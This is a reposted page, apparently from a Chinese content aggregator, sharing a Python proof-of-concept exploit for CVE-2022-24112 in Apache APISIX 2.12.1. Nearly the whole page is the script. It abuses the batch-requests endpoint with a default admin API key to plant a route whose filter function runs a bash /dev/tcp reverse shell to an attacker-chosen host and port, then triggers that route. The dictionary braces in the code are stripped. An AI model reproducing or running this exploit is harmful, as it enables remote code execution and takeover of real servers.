[POC分享] CVE: 2022-24112:Apache APISIX 2.12.1 - Remote Code Execution (RCE)

Posted IT鹅

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[POC分享] CVE: 2022-24112:Apache APISIX 2.12.1 - Remote Code Execution (RCE)相关的知识,希望对你有一定的参考价值。

# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
# Date: 2022-03-16
# Exploit Author: Ven3xy
# Vendor Homepage: https://apisix.apache.org/
# Version: Apache APISIX 1.32.12.1
# Tested on: CentOS 7
# CVE : CVE-2022-24112


import requests
import sys

class color:
    HEADER = '\\033[95m'
    IMPORTANT = '\\33[35m'
    NOTICE = '\\033[33m'
    OKBLUE = '\\033[94m'
    OKGREEN = '\\033[92m'
    WARNING = '\\033[93m'
    RED = '\\033[91m'
    END = '\\033[0m'
    UNDERLINE = '\\033[4m'
    LOGGING = '\\33[34m'
color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]    
    

def banner():
    run = color_random[6]+'''\\n                                   .     , 
        _.._ * __*\\./ ___  _ \\./._ | _ *-+-
       (_][_)|_) |/'\\     (/,/'\\[_)|(_)| | 
          |                     |          
\\n'''
    run2 = color_random[2]+'''\\t\\t(CVE-2022-24112)\\n'''           
    run3 = color_random[4]+''' Coded By: Ven3xy  | Github: https://github.com/M4xSec/ \\n\\n'''
    print(run+run2+run3)    

if (len(sys.argv) != 4):
    banner()
    print("[!] Usage   : ./apisix-exploit.py <target_url> <lhost> <lport>")
    exit()
    
else:
    banner()
    target_url = sys.argv[1]  
    lhost = sys.argv[2]
    lport = sys.argv[3]
    
headers1 = 
    'Host': '127.0.0.1:8080',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
    'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Content-Length': '540',
    'Connection': 'close',


headers2 = 
    'Host': '127.0.0.1:8080',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
    'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Connection': 'close',


json_data = 
    'headers': 
        'X-Real-IP': '127.0.0.1',
        'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
        'Content-Type': 'application/json',
    ,
    'timeout': 1500,
    'pipeline': [
        
            'path': '/apisix/admin/routes/index',
            'method': 'PUT',
            'body': '"uri":"/rms/fzxewh","upstream":"type":"roundrobin","nodes":"schmidt-schaefer.com":1,"name":"wthtzv","filter_func":"function(vars) os.execute(\\'bash -c \\\\\\\\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\\\\\\\"\\'); return true end"',
        ,
    ],


response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False)

response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)

以上是关于[POC分享] CVE: 2022-24112:Apache APISIX 2.12.1 - Remote Code Execution (RCE)的主要内容,如果未能解决你的问题,请参考以下文章

[POC分享]CVE: 2021-21972:VMware vCenter Server 7.0 - Unauthenticated File Upload

[POC分享]CVE-2021-04-06 vsftpd 3.0.3 - Remote Denial of Service

[POC分享]CVE-2021-04-06 vsftpd 3.0.3 - Remote Denial of Service

Python3实现PoC——CVE-2014-6271

[POC分享]Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)

计算机漏洞安全相关的概念POC EXP VUL CVE 0DAY